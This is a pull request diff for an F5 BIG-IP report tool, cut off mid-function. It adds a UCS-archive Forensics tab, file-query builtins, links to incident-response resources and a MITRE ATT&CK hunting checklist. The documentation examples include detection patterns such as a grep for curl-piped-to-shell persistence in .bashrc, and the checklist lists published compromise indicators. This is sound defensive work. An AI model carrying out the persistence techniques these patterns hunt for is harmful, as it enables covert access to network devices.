### PR TITLE
feat(bigip-report): F5 Sites tab + UCS forensic file access (Forensics tab, f5-query file builtins)

### DIFF
--- a/docs/references/f5_query/builtins.md
+++ b/docs/references/f5_query/builtins.md
@@ -5666,6 +5666,44 @@ Related: ``x509_from_config`` (stanza metadata only), ``x509_eq``,
 .sys["file-ssl-cert"][] | ucs_cert(.) | {subject, fingerprint_sha256, not_after}
 ```
 
+### `files` / `file` / `glob` / `grep`
+
+Forensic access to the OS files **inside** a source's UCS archive — the paths an
+attacker tampers with on a compromised BIG-IP (login-persistence dotfiles and
+SSH keys, the local account databases, external-auth / PAM config, syslog-ng,
+cron). Only available when the source is a `.ucs` read through the f5 CLI (the
+in-browser console has no archive to read and these error clearly).
+
+**Signatures**
+
+- `files() -> [object]` — the forensic member inventory; each entry is
+  `{path, size, sha256, is_text}` (metadata only, no content).
+- `glob(pattern: string) -> [object]` — inventory entries whose `path` matches a
+  shell glob (`*`, `?`).
+- `file(path: string) -> object` — one member by exact path, with `content`
+  attached for text files (`null` for binary / missing / sensitive). `null` when
+  the path is absent.
+- `grep(pattern: string[, path_glob: string]) -> [object]` — regex-search text
+  members (optionally scoped by a path glob), returning `{path, line, text}` per
+  match.
+
+**Details**
+
+`content` is only ever populated for small non-sensitive text files; `etc/shadow`
+and private keys are classified sensitive and their bytes are never returned.
+The inventory is scoped to the same forensic member set the report's Forensics
+tab uses.
+
+**Examples**
+
+```
+files | length
+glob("home/*/.ssh/authorized_keys")
+file("etc/passwd") | .content
+grep("^[^:]+:[^:]*:0:", "etc/passwd")          # UID 0 accounts
+grep("nohup|curl .*\\| *sh", "home/*/.bashrc") # login-hook persistence
+```
+
 ### `url_get`
 
 HTTP GET request.  Requires --enable-probes.

--- a/rust/bigip-query-py/python/f5report/render.py
+++ b/rust/bigip-query-py/python/f5report/render.py
@@ -87,10 +87,12 @@ def render_report(model: dict[str, Any], *, embed_console: bool | None = None) -
     model["topology_css"] = _asset_text("topology.css")
     model["certs_css"] = _asset_text("certs.css")
     model["secrets_css"] = _asset_text("secrets.css")
+    model["forensics_css"] = _asset_text("forensics.css")
     model["report_js"] = _asset_text("report.js")
     model["topology_js"] = _asset_text("topology.js")
     model["certs_js"] = _asset_text("certs.js")
     model["secrets_js"] = _asset_text("secrets.js")
+    model["forensics_js"] = _asset_text("forensics.js")
     model["irule_flow_js"] = _asset_text("irule-flow.js")
 
     # In-browser query console: the wasm build of the query engine, inlined.

--- a/rust/bigip-query-py/python/f5report/report.py
+++ b/rust/bigip-query-py/python/f5report/report.py
@@ -560,6 +560,11 @@ def _collect_device(uri: str, source: str) -> dict[str, Any]:
     device["counts"]["orphans"] = sum(len(v) for v in device["orphans"].values())
     device["counts"]["certificates"] = len(device["certificates"])
     device["counts"]["secrets"] = len(device["secrets"])
+    # The Forensics tab is driven by the UCS file inventory, which is extracted
+    # at the Rust/WASM entry point; the Python library path does not pull UCS
+    # members, so it reports zero forensic files (the tab stays hidden).
+    device["forensics"] = {"files": [], "checklist": []}
+    device["counts"]["files"] = 0
     device["insights"] = _insights(device)
     return device
 

--- a/rust/bigip-query-py/python/f5report/templates/forensics.css
+++ b/rust/bigip-query-py/python/f5report/templates/forensics.css
@@ -1,0 +1,41 @@
+/* Forensics tab — UCS file inventory + ATT&CK-mapped hunting checklist. */
+.forensics-view { margin-top: 4px; }
+
+.fx-checklist {
+  display: grid;
+  grid-template-columns: repeat(auto-fit, minmax(260px, 1fr));
+  gap: 10px;
+  margin: 4px 0 18px;
+}
+.fx-check {
+  border: 1px solid var(--line);
+  border-left: 3px solid var(--muted);
+  border-radius: 9px;
+  background: var(--panel);
+  padding: 10px 12px;
+}
+.fx-check-head { display: flex; align-items: center; gap: 8px; flex-wrap: wrap; }
+.fx-verdict {
+  font-size: 10px; text-transform: uppercase; letter-spacing: .04em; font-weight: 700;
+  padding: 1px 6px; border-radius: 5px; background: var(--tag-bg); color: var(--tag-ink);
+}
+.fx-check-label { font-weight: 640; font-size: 13px; }
+.fx-attack { margin-left: auto; font-family: var(--mono); font-size: 10px; color: var(--muted); }
+.fx-check-detail { margin-top: 5px; font-size: 12px; color: var(--muted); }
+
+.fx-red { border-left-color: var(--red); }
+.fx-red .fx-verdict { background: color-mix(in srgb, var(--red) 16%, transparent); color: var(--red); }
+.fx-amber { border-left-color: var(--amber); }
+.fx-amber .fx-verdict { background: color-mix(in srgb, var(--amber) 18%, transparent); color: var(--amber); }
+.fx-blue { border-left-color: var(--blue); }
+.fx-blue .fx-verdict { background: color-mix(in srgb, var(--blue) 16%, transparent); color: var(--blue); }
+.fx-green { border-left-color: var(--green); }
+.fx-green .fx-verdict { background: color-mix(in srgb, var(--green) 16%, transparent); color: var(--green); }
+.fx-muted { opacity: .72; }
+
+.fx-reveal {
+  padding: 3px 10px; border: 1px solid var(--line); border-radius: 7px;
+  background: var(--bg); color: var(--ink); font-size: 12px; cursor: pointer;
+}
+.fx-reveal:hover { border-color: var(--accent); color: var(--accent); }
+.fx-content pre { margin: 0; max-height: 340px; overflow: auto; }

--- a/rust/bigip-query-py/python/f5report/templates/forensics.js
+++ b/rust/bigip-query-py/python/f5report/templates/forensics.js
@@ -1,0 +1,91 @@
+// f5report — Forensics tab. Renders the UCS file inventory + the ATT&CK-mapped
+// hunting checklist from the embedded model. File contents (non-sensitive text
+// only) sit behind a per-file reveal; shadow / private keys are never embedded.
+// Everything is client-side — nothing left the browser.
+(function () {
+  "use strict";
+  var MODEL = null;
+  try { MODEL = JSON.parse(document.getElementById("f5-model").textContent); }
+  catch (e) { return; }
+  if (!MODEL || !MODEL.devices) return;
+
+  function esc(s) {
+    return String(s == null ? "" : s).replace(/[&<>"]/g, function (c) {
+      return { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;" }[c];
+    });
+  }
+  function fmtSize(n) {
+    n = +n || 0;
+    if (n < 1024) return n + " B";
+    if (n < 1024 * 1024) return (n / 1024).toFixed(1) + " KB";
+    return (n / (1024 * 1024)).toFixed(1) + " MB";
+  }
+  var VERDICT_TONE = { alert: "red", warn: "amber", info: "blue", clear: "green", absent: "muted" };
+
+  function renderChecklist(checklist) {
+    if (!checklist || !checklist.length) return "";
+    var cards = checklist.map(function (c) {
+      var tone = VERDICT_TONE[c.verdict] || "muted";
+      return '<div class="fx-check fx-' + tone + '">' +
+        '<div class="fx-check-head"><span class="fx-verdict">' + esc(c.verdict) + "</span>" +
+        '<span class="fx-check-label">' + esc(c.label) + "</span>" +
+        '<span class="fx-attack">' + esc(c.attack) + "</span></div>" +
+        '<div class="fx-check-detail">' + esc(c.detail) + "</div></div>";
+    }).join("");
+    return '<div class="fx-checklist">' + cards + "</div>";
+  }
+
+  function renderFiles(files) {
+    if (!files || !files.length) {
+      return '<p class="hint">No forensic files in this source. Generate the report from a ' +
+        "<code>.ucs</code> archive (not a bare <code>bigip.conf</code>) to populate this view.</p>";
+    }
+    var rows = files.map(function (f, i) {
+      var actions;
+      if (f.sensitive) {
+        actions = '<span class="tag amber" title="password hashes / private keys are never embedded in the report">masked — sensitive</span>';
+      } else if (f.content != null) {
+        actions = '<button type="button" class="fx-reveal" data-i="' + i + '">View</button>';
+      } else {
+        actions = '<span class="muted">—</span>';
+      }
+      var sha = esc((f.sha256 || "").slice(0, 16));
+      var main = '<tr class="fx-row" data-cat="' + esc(f.category) + '">' +
+        '<td class="mono strong">' + esc(f.path) + "</td>" +
+        '<td><span class="tag">' + esc(f.category) + "</span></td>" +
+        '<td class="mono small">' + fmtSize(f.size) + "</td>" +
+        '<td class="mono small" title="' + esc(f.sha256) + '">' + sha + "…</td>" +
+        "<td>" + actions + "</td></tr>";
+      var detail = (f.content != null && !f.sensitive)
+        ? '<tr class="fx-content" data-i="' + i + '" hidden><td colspan="5"><pre class="code">' +
+          esc(f.content) + "</pre></td></tr>"
+        : "";
+      return main + detail;
+    }).join("");
+    return '<div class="tablewrap"><table class="grid fx-table"><thead><tr>' +
+      "<th>Path</th><th>Category</th><th>Size</th><th>SHA-256</th><th></th>" +
+      "</tr></thead><tbody>" + rows + "</tbody></table></div>";
+  }
+
+  function wire(view) {
+    view.querySelectorAll(".fx-reveal").forEach(function (btn) {
+      btn.addEventListener("click", function () {
+        var row = view.querySelector('.fx-content[data-i="' + btn.getAttribute("data-i") + '"]');
+        if (!row) return;
+        row.hidden = !row.hidden;
+        btn.textContent = row.hidden ? "View" : "Hide";
+      });
+    });
+  }
+
+  MODEL.devices.forEach(function (d, di) {
+    var deviceEl = document.querySelector('.device[data-dev="' + di + '"]') ||
+      document.querySelectorAll(".device")[di];
+    if (!deviceEl) return;
+    var view = deviceEl.querySelector('.panel[data-panel="forensics"] .forensics-view');
+    if (!view) return;
+    var fx = d.forensics || { files: [], checklist: [] };
+    view.innerHTML = renderChecklist(fx.checklist) + renderFiles(fx.files);
+    wire(view);
+  });
+})();

--- a/rust/bigip-query-py/python/f5report/templates/report.css
+++ b/rust/bigip-query-py/python/f5report/templates/report.css
@@ -161,6 +161,22 @@ pre.code{margin:6px 0;padding:12px 14px;background:var(--bg);border-radius:8px;o
 @media (hover:hover){.chip.chip-link:hover{transform:translateY(-1px);box-shadow:0 2px 8px rgba(0,0,0,.12)}}
 .chip.chip-link:focus-visible{outline:2px solid var(--accent,#2563eb);outline-offset:2px}
 
+/* ---- F5 Sites — community / support / security-IR resources tab ---------- */
+.f5sites-groups{display:grid;grid-template-columns:repeat(auto-fit,minmax(240px,1fr));gap:14px;margin:4px 0 22px}
+.f5sites-group{border:1px solid var(--line);border-radius:12px;background:var(--panel);padding:14px 16px;box-shadow:var(--shadow)}
+.f5sites-group h3{font-size:12px;margin:0 0 8px;text-transform:uppercase;letter-spacing:.04em;color:var(--muted)}
+.f5sites-group.danger{border-color:color-mix(in srgb,var(--amber) 45%,var(--line))}
+.f5sites-group.danger h3{color:var(--amber)}
+.f5sites-links{list-style:none;margin:0;padding:0;display:flex;flex-direction:column;gap:1px}
+.f5sites-links a{display:block;padding:6px 8px;border-radius:7px;color:var(--ink);font-size:13px;text-decoration:none}
+.f5sites-links a::after{content:"\2197";color:var(--muted);font-size:10px;margin-left:5px;vertical-align:1px}
+@media (hover:hover){.f5sites-links a:hover{background:var(--bg);color:var(--accent)}}
+.f5sites-links a:focus-visible{outline:2px solid var(--accent);outline-offset:1px}
+.f5sites-links .k{display:inline-block;font-family:var(--mono);font-size:10px;color:var(--muted);background:var(--tag-bg);border-radius:5px;padding:1px 5px;margin-right:6px}
+.f5sites-h{font-size:14px;margin:6px 0 8px}
+.f5sites-ioc{margin:14px 0 4px;padding:12px 14px;border:1px solid color-mix(in srgb,var(--amber) 40%,var(--line));border-left:3px solid var(--amber);border-radius:9px;background:color-mix(in srgb,var(--amber) 6%,var(--panel));font-size:12.5px;line-height:1.55}
+.f5sites-ioc code{font-family:var(--mono);font-size:11px;background:var(--bg);border:1px solid var(--line);border-radius:5px;padding:1px 5px}
+
 /* ---- Print stylesheet ---------------------------------------------------- */
 @media print {
   :root{color-scheme:light}

--- a/rust/bigip-query-py/python/f5report/templates/report.html.j2
+++ b/rust/bigip-query-py/python/f5report/templates/report.html.j2
@@ -12,6 +12,7 @@
 {{ topology_css | safe }}
 {{ certs_css | safe }}
 {{ secrets_css | safe }}
+{{ forensics_css | safe }}
 </style>
 </head>
 <body>
@@ -103,6 +104,7 @@
     <button class="tab" data-panel="profiles">Profiles <span class="n">{{ d.counts.profiles }}</span></button>
     <button class="tab" data-panel="certificates">SSL Certificates <span class="n">{{ d.counts.certificates }}</span></button>
     {% if d.counts.secrets %}<button class="tab" data-panel="secrets">Secrets <span class="n">{{ d.counts.secrets }}</span></button>{% endif %}
+    {% if d.counts.files %}<button class="tab" data-panel="forensics">Forensics <span class="n">{{ d.counts.files }}</span></button>{% endif %}
     <button class="tab" data-panel="topology">Topology</button>
     <button class="tab" data-panel="listener">Listener Matcher</button>
     <button class="tab" data-panel="apps">Apps <span class="n app-badge">0</span></button>
@@ -379,6 +381,14 @@
   </div>
   {% endif %}
 
+  {#: ---------------- Forensics (UCS file inventory + hunting checklist) ---------------- :#}
+  {% if d.counts.files %}
+  <div class="panel" data-panel="forensics">
+    <p class="lm-field-note">Forensic inventory of the OS files inside this device's <code>.ucs</code> — the paths an attacker tampers with on a compromised BIG-IP, each with its size and <b>SHA-256</b> (diff it against a known-good host). The checklist runs the <b>UCS forensic checks</b> (see the <b>F5 Sites</b> tab) live against the archive and flags what it finds. File contents are shown only for small non-sensitive text files, behind a per-file reveal; <code>shadow</code> and private keys are <b>never embedded</b> — nothing here left your browser.</p>
+    <div class="forensics-view"></div>
+  </div>
+  {% endif %}
+
   {#: ---------------- Topology ---------------- :#}
   <div class="panel" data-panel="topology">
     <div class="topo-controls">
@@ -644,6 +654,9 @@
 </script>
 <script>
 {{ secrets_js | safe }}
+</script>
+<script>
+{{ forensics_js | safe }}
 </script>
 {% if has_console %}
 <!-- in-browser query engine: wasm-bindgen glue + base64 wasm (the f5-query DSL compiled to WebAssembly) -->

--- a/rust/bigip-query-py/python/f5report/templates/report.html.j2
+++ b/rust/bigip-query-py/python/f5report/templates/report.html.j2
@@ -106,6 +106,7 @@
     <button class="tab" data-panel="topology">Topology</button>
     <button class="tab" data-panel="listener">Listener Matcher</button>
     <button class="tab" data-panel="apps">Apps <span class="n app-badge">0</span></button>
+    <button class="tab" data-panel="f5sites">F5 Sites</button>
     {% if has_console %}
     <button class="tab" data-panel="console">Query Console</button>
     {% endif %}
@@ -431,6 +432,116 @@
   {#: ---------------- Apps (user-bundled virtual servers) ---------------- :#}
   <div class="panel" data-panel="apps">
     <div class="apps-view"></div>
+  </div>
+
+  {#: ---------------- F5 Sites — community / support / security-IR resources ---------------- :#}
+  <div class="panel" data-panel="f5sites">
+    <p class="lm-field-note">Curated F5 community, support and <b>security-incident-response</b> resources. Because this report is often generated from a <code>.ucs</code> archive of a device under investigation, the <b>UCS forensic checklist</b> below ties each archive path to the attacker behaviour to look for and its <a href="https://attack.mitre.org/" target="_blank" rel="noopener noreferrer">MITRE ATT&amp;CK</a> technique. Every link opens on F5 DevCentral, my.F5 or CISA — nothing here is loaded to render the page or phones home.</p>
+
+    <div class="f5sites-groups">
+      <section class="f5sites-group">
+        <h3>DevCentral &amp; community</h3>
+        <ul class="f5sites-links">
+          <li><a href="https://community.f5.com/" target="_blank" rel="noopener noreferrer">DevCentral home</a></li>
+          <li><a href="https://community.f5.com/category/Forums/discussions/TechnicalForum" target="_blank" rel="noopener noreferrer">Technical Forum</a></li>
+          <li><a href="https://community.f5.com/category/articles/kb/technicalarticles" target="_blank" rel="noopener noreferrer">Technical Articles</a></li>
+          <li><a href="https://community.f5.com/category/articles/kb/security-insights" target="_blank" rel="noopener noreferrer">Security Insights (F5 SIRT)</a></li>
+          <li><a href="https://community.f5.com/category/CrowdSRC" target="_blank" rel="noopener noreferrer">CrowdSRC</a></li>
+          <li><a href="https://community.f5.com/category/GroupsCategory" target="_blank" rel="noopener noreferrer">Groups</a></li>
+          <li><a href="https://community.f5.com/category/top/events/Events" target="_blank" rel="noopener noreferrer">Events</a></li>
+          <li><a href="https://community.f5.com/category/top/ideas/Suggestions" target="_blank" rel="noopener noreferrer">Ideas &amp; suggestions</a></li>
+        </ul>
+      </section>
+
+      <section class="f5sites-group">
+        <h3>Support &amp; documentation</h3>
+        <ul class="f5sites-links">
+          <li><a href="https://my.f5.com/manage/s/" target="_blank" rel="noopener noreferrer">MyF5 support portal</a></li>
+          <li><a href="https://techdocs.f5.com/" target="_blank" rel="noopener noreferrer">Product documentation</a></li>
+          <li><a href="https://my.f5.com/manage/s/downloads" target="_blank" rel="noopener noreferrer">Software downloads</a></li>
+          <li><a href="https://www.f5.com/support/security-incident-response-team-sirt" target="_blank" rel="noopener noreferrer">F5 SIRT</a></li>
+          <li><a href="https://www.f5.com/labs" target="_blank" rel="noopener noreferrer">F5 Labs threat intelligence</a></li>
+          <li><a href="https://community.f5.com/t5/technical-articles/how-to-get-a-f5-big-ip-ve-developer-lab-license/ta-p/279858" target="_blank" rel="noopener noreferrer">Get a developer lab license</a></li>
+        </ul>
+      </section>
+
+      <section class="f5sites-group danger">
+        <h3>Compromise &amp; UCS forensics</h3>
+        <ul class="f5sites-links">
+          <li><a href="https://community.f5.com/kb/technicalarticles/inspecting-a-ucs-file-from-a-compromised-big-ip/330994" target="_blank" rel="noopener noreferrer">Inspecting a UCS file from a compromised BIG-IP</a></li>
+          <li><a href="https://community.f5.com/kb/security-insights/how-the-f5-sirt-looks-for-malware/335011" target="_blank" rel="noopener noreferrer">How the F5 SIRT looks for malware</a></li>
+          <li><a href="https://my.f5.com/manage/s/article/K11438344" target="_blank" rel="noopener noreferrer"><span class="k">K11438344</span>Suspected security compromise on a BIG-IP</a></li>
+          <li><a href="https://my.f5.com/manage/s/article/K4423" target="_blank" rel="noopener noreferrer"><span class="k">K4423</span>Overview of UCS archives</a></li>
+          <li><a href="https://community.f5.com/kb/technicalarticles/introduction-of-incident-response/312042" target="_blank" rel="noopener noreferrer">Introduction to incident response</a></li>
+        </ul>
+      </section>
+
+      <section class="f5sites-group">
+        <h3>Hardening &amp; advisories</h3>
+        <ul class="f5sites-links">
+          <li><a href="https://community.f5.com/kb/technicalarticles/security-best-practices-for-f5-products/302468" target="_blank" rel="noopener noreferrer">Security best practices for F5 products</a></li>
+          <li><a href="https://my.f5.com/manage/s/article/K13092" target="_blank" rel="noopener noreferrer"><span class="k">K13092</span>Securing access to the BIG-IP system</a></li>
+          <li><a href="https://my.f5.com/manage/s/article/K13309" target="_blank" rel="noopener noreferrer"><span class="k">K13309</span>Restrict the Configuration utility by source IP</a></li>
+          <li><a href="https://my.f5.com/manage/s/article/K4602" target="_blank" rel="noopener noreferrer"><span class="k">K4602</span>F5 security vulnerability response policy</a></li>
+          <li><a href="https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices" target="_blank" rel="noopener noreferrer">CISA ED 26-01 — mitigate F5 vulnerabilities</a></li>
+          <li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138a" target="_blank" rel="noopener noreferrer">CISA AA22-138A — CVE-2022-1388</a></li>
+        </ul>
+      </section>
+    </div>
+
+    <h3 class="f5sites-h">UCS forensic checklist — where to hunt and what it maps to</h3>
+    <p class="hint">List the archive with <code>tar -ztf archive.ucs</code>, then extract and inspect the paths below. Compare against a known-good backup where you have one — a UCS taken from an already-compromised host can itself carry the implant.</p>
+    <div class="tablewrap">
+    <table class="grid">
+      <thead><tr><th>Where to look (UCS path / config)</th><th>What an attacker does there</th><th>MITRE ATT&amp;CK</th></tr></thead>
+      <tbody>
+        <tr>
+          <td class="mono small"><code>home/*/.bashrc</code>, <code>.bash_profile</code>, <code>.bash_login</code></td>
+          <td>Shell-init hooks that silently re-launch malware whenever a user logs in — a favourite way to survive a clean-up.</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1546/004/" target="_blank" rel="noopener noreferrer">T1546.004</a></td>
+        </tr>
+        <tr>
+          <td class="mono small"><code>home/*/.ssh/authorized_keys</code></td>
+          <td>Attacker-controlled SSH key for durable access. On password-auth deployments this file is normally absent or empty — any key is suspect.</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1098/004/" target="_blank" rel="noopener noreferrer">T1098.004</a></td>
+        </tr>
+        <tr>
+          <td class="mono small"><code>etc/passwd</code>, <code>etc/shadow</code></td>
+          <td>Backdoor local accounts, unexpected UID&nbsp;0 users, or altered password hashes.</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1136/" target="_blank" rel="noopener noreferrer">T1136</a> · <a href="https://attack.mitre.org/techniques/T1078/" target="_blank" rel="noopener noreferrer">T1078</a></td>
+        </tr>
+        <tr>
+          <td class="mono small"><code>etc/nsswitch.conf</code>, <code>etc/openldap/*</code>, <code>etc/krb5.conf</code>, <code>etc/security/*</code></td>
+          <td>Redirected or weakened external authentication (LDAP/AD/RADIUS/Kerberos/PAM) to plant rogue trust or harvest credentials.</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1556/" target="_blank" rel="noopener noreferrer">T1556</a></td>
+        </tr>
+        <tr>
+          <td class="mono small"><code>etc/syslog-ng/*</code></td>
+          <td>Logging disabled or quietly redirected so on-box activity is never recorded or forwarded.</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1562/006/" target="_blank" rel="noopener noreferrer">T1562.006</a></td>
+        </tr>
+        <tr>
+          <td class="mono small"><code>config/*</code> iRules — cross-check the <b>iRules</b> tab</td>
+          <td>An HTTP-event iRule acting as a web shell / covert C2: running commands or exfiltrating on a magic URI, header or cookie.</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1505/003/" target="_blank" rel="noopener noreferrer">T1505.003</a> · <a href="https://attack.mitre.org/techniques/T1059/" target="_blank" rel="noopener noreferrer">T1059</a></td>
+        </tr>
+        <tr>
+          <td class="mono small">System binaries (running host, not in the UCS): <code>/usr/bin/umount</code>, <code>/usr/sbin/httpd</code></td>
+          <td>Trojanised binaries — hash, size or mtime that differ from the known-good release.</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1554/" target="_blank" rel="noopener noreferrer">T1554</a></td>
+        </tr>
+        <tr>
+          <td class="mono small"><code>etc/motd</code></td>
+          <td>Tampered login banner (defacement / taunt, or to mask changes).</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1491/" target="_blank" rel="noopener noreferrer">T1491</a></td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+    <div class="f5sites-ioc">
+      <b>Point-in-time indicators (2025 F5 incident &amp; SIRT reporting).</b> Reported artefacts have included the files <code>/run/bigtlog.pipe</code> and <code>/run/bigstart.ltm</code>; size / hash / timestamp mismatches on <code>/usr/bin/umount</code> and <code>/usr/sbin/httpd</code>; the account <code>f5hubblelcdadmin</code> reaching iControl&nbsp;REST from <code>localhost</code>; <code>auditd</code> entries that disable SELinux; and C2 disguised as <code>HTTP&nbsp;201</code> responses carrying a <code>text/css</code> content-type. These indicators are volatile and version-specific — confirm against the current <a href="https://community.f5.com/kb/security-insights/how-the-f5-sirt-looks-for-malware/335011" target="_blank" rel="noopener noreferrer">F5 SIRT</a> and <a href="https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices" target="_blank" rel="noopener noreferrer">CISA</a> guidance rather than treating them as a fixed signature list.
+    </div>
   </div>
 
   {% if has_console %}

--- a/rust/bigip-query-py/python/f5report/templates/report.html.j2
+++ b/rust/bigip-query-py/python/f5report/templates/report.html.j2
@@ -487,6 +487,28 @@
           <li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138a" target="_blank" rel="noopener noreferrer">CISA AA22-138A — CVE-2022-1388</a></li>
         </ul>
       </section>
+
+      <section class="f5sites-group">
+        <h3>Gov advisories &amp; malware analysis</h3>
+        <ul class="f5sites-links">
+          <li><a href="https://media.defense.gov/2025/Dec/04/2003834878/-1/-1/0/MALWARE-ANALYSIS-REPORT-BRICKSTORM-BACKDOOR.PDF" target="_blank" rel="noopener noreferrer">CISA/NSA/CCCS — BRICKSTORM MAR (YARA + Sigma)</a></li>
+          <li><a href="https://www.cisa.gov/news-events/news/cisa-nsa-and-cyber-centre-warn-critical-infrastructure-brickstorm-malware-used-peoples-republic" target="_blank" rel="noopener noreferrer">CISA/NSA/CCCS — BRICKSTORM advisory</a></li>
+          <li><a href="https://www.ncsc.gov.uk/news/confirmed-compromise-f5-network" target="_blank" rel="noopener noreferrer">NCSC UK — confirmed compromise of F5</a></li>
+          <li><a href="https://www.cyber.gc.ca/en/alerts-advisories/active-exploitation-f5-big-ip-vulnerability" target="_blank" rel="noopener noreferrer">Canadian CCCS — active exploitation of F5 BIG-IP</a></li>
+          <li><a href="https://www.hhs.gov/sites/default/files/f5-misconfiguration-analyst-note-tlpclear.pdf" target="_blank" rel="noopener noreferrer">HHS — F5 misconfiguration analyst note</a></li>
+        </ul>
+      </section>
+
+      <section class="f5sites-group">
+        <h3>Threat intel &amp; detection</h3>
+        <ul class="f5sites-links">
+          <li><a href="https://www.sygnia.co/blog/china-nexus-threat-group-velvet-ant/" target="_blank" rel="noopener noreferrer">Sygnia — &#34;Velvet Ant&#34; abuses F5 BIG-IP</a></li>
+          <li><a href="https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect" target="_blank" rel="noopener noreferrer">Mandiant / Google Cloud — F5 BIG-IP CVE-2023-46747</a></li>
+          <li><a href="https://community.f5.com/kb/security-insights/f5-threat-report---september-22nd-2025/343645" target="_blank" rel="noopener noreferrer">F5 Threat Report series (DevCentral)</a></li>
+          <li><a href="https://my.f5.com/manage/s/article/K000156572" target="_blank" rel="noopener noreferrer"><span class="k">K000156572</span>F5 BIG-IP threat hunting guide (2025)</a></li>
+          <li><a href="https://socprime.com/blog/velvet-ant-activity-detection-china-backed-cyber-espionage-group-launches-a-prolonged-attack-using-malware-deployed-on-the-f5-big-ip-devices/" target="_blank" rel="noopener noreferrer">SOC Prime — Velvet Ant Sigma detections</a></li>
+        </ul>
+      </section>
     </div>
 
     <h3 class="f5sites-h">UCS forensic checklist — where to hunt and what it maps to</h3>

--- a/rust/bigip-query-py/python/f5report/templates/report.html.j2
+++ b/rust/bigip-query-py/python/f5report/templates/report.html.j2
@@ -104,7 +104,7 @@
     <button class="tab" data-panel="profiles">Profiles <span class="n">{{ d.counts.profiles }}</span></button>
     <button class="tab" data-panel="certificates">SSL Certificates <span class="n">{{ d.counts.certificates }}</span></button>
     {% if d.counts.secrets %}<button class="tab" data-panel="secrets">Secrets <span class="n">{{ d.counts.secrets }}</span></button>{% endif %}
-    {% if d.counts.files %}<button class="tab" data-panel="forensics">Forensics <span class="n">{{ d.counts.files }}</span></button>{% endif %}
+    {% if d.counts.files or d.forensics.flagged %}<button class="tab" data-panel="forensics">Forensics <span class="n">{{ d.counts.files }}</span></button>{% endif %}
     <button class="tab" data-panel="topology">Topology</button>
     <button class="tab" data-panel="listener">Listener Matcher</button>
     <button class="tab" data-panel="apps">Apps <span class="n app-badge">0</span></button>
@@ -382,7 +382,7 @@
   {% endif %}
 
   {#: ---------------- Forensics (UCS file inventory + hunting checklist) ---------------- :#}
-  {% if d.counts.files %}
+  {% if d.counts.files or d.forensics.flagged %}
   <div class="panel" data-panel="forensics">
     <p class="lm-field-note">Forensic inventory of the OS files inside this device's <code>.ucs</code> — the paths an attacker tampers with on a compromised BIG-IP, each with its size and <b>SHA-256</b> (diff it against a known-good host). The checklist runs the <b>UCS forensic checks</b> (see the <b>F5 Sites</b> tab) live against the archive and flags what it finds. File contents are shown only for small non-sensitive text files, behind a per-file reveal; <code>shadow</code> and private keys are <b>never embedded</b> — nothing here left your browser.</p>
     <div class="forensics-view"></div>

--- a/rust/bigip-report-wasm/Cargo.lock
+++ b/rust/bigip-report-wasm/Cargo.lock
@@ -789,6 +789,7 @@ dependencies = [
  "serde_json",
  "sha2",
  "tcl-bigip",
+ "tcl-registry",
  "x509-parser",
 ]
 
@@ -816,6 +817,15 @@ name = "tcl-bytecode"
 version = "0.1.0"
 dependencies = [
  "tcl-lexer",
+ "tcl-syntax",
+]
+
+[[package]]
+name = "tcl-cmd-core"
+version = "0.1.0"
+dependencies = [
+ "tcl-platform",
+ "tcl-runtime-api",
  "tcl-syntax",
 ]
 
@@ -876,15 +886,27 @@ dependencies = [
 ]
 
 [[package]]
+name = "tcl-platform"
+version = "0.1.0"
+
+[[package]]
 name = "tcl-registry"
 version = "0.1.0"
 dependencies = [
  "bitflags",
  "rustc-hash",
  "sha2",
+ "tcl-cmd-core",
  "tcl-core-types",
  "tcl-lexer",
  "tcl-syntax",
+]
+
+[[package]]
+name = "tcl-runtime-api"
+version = "0.1.0"
+dependencies = [
+ "tcl-core-types",
 ]
 
 [[package]]

--- a/rust/bigip-report-wasm/src/lib.rs
+++ b/rust/bigip-report-wasm/src/lib.rs
@@ -116,6 +116,66 @@ pub fn extract_cert_files(
     serde_json::to_string(&map).map_err(|e| JsError::new(&e.to_string()))
 }
 
+/// Recover the forensic file inventory from a UCS archive.
+///
+/// Enumerates the members an attacker tampers with on a compromised BIG-IP
+/// (login-persistence dotfiles + SSH keys, the local account databases,
+/// external-auth / PAM config, syslog-ng, cron — see
+/// [`tcl_bigip_io::MemberScope::Forensic`]) with per-file metadata (size,
+/// SHA-256, text/binary), and reads back the content of the small text files so
+/// the Forensics tab can run its heuristics and show them. Content over
+/// `MAX_FORENSIC_CONTENT` bytes, or binary, is metadata-only. A non-UCS input
+/// (a bare `bigip.conf`) returns `[]`. Returns a JSON array of
+/// `{path, size, sha256, isText, content?}`; feed the map `{name: <that array>}`
+/// into [`generate_report`]. Nothing leaves the page.
+#[wasm_bindgen]
+pub fn extract_files(name: &str, bytes: &[u8], passphrase: &str) -> Result<String, JsError> {
+    use tcl_bigip_io::{list_ucs_members, read_ucs_member, MemberScope};
+
+    /// Cap on embedded content per file (256 KiB): forensic config/auth files
+    /// are small, but a runaway log-config include shouldn't bloat the page.
+    const MAX_FORENSIC_CONTENT: u64 = 256 * 1024;
+
+    let is_ucs_ext = std::path::Path::new(name)
+        .extension()
+        .and_then(|e| e.to_str())
+        .is_some_and(|e| e.eq_ignore_ascii_case("ucs"));
+    if !(is_pgp_bytes(bytes) || (is_ucs_bytes(bytes) && is_ucs_ext)) {
+        return Ok("[]".to_string());
+    }
+
+    let opts = PassphraseOptions {
+        explicit: (!passphrase.is_empty()).then(|| passphrase.to_owned()),
+        allow_prompt: false,
+        ..PassphraseOptions::default()
+    };
+    let provider = move || resolve_passphrase(&opts);
+
+    let entries = list_ucs_members(bytes, &provider, name, MemberScope::Forensic)
